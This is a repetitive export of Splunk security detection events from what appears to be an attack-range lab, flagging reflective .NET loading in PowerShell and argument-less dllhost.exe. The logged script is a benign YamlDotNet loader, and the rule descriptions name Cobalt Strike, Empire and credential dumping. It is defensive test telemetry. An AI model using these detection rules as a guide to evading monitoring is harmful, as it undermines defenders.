\"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T13:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T13:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664981733, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T13:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T13:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664974800, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664974800", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="2304", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664974800, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664974800", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x900", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664978132, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T12:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T12:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664978132, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T12:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T12:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664978132, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T12:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T12:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664978132, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T12:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T12:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664971200, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664971200", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", 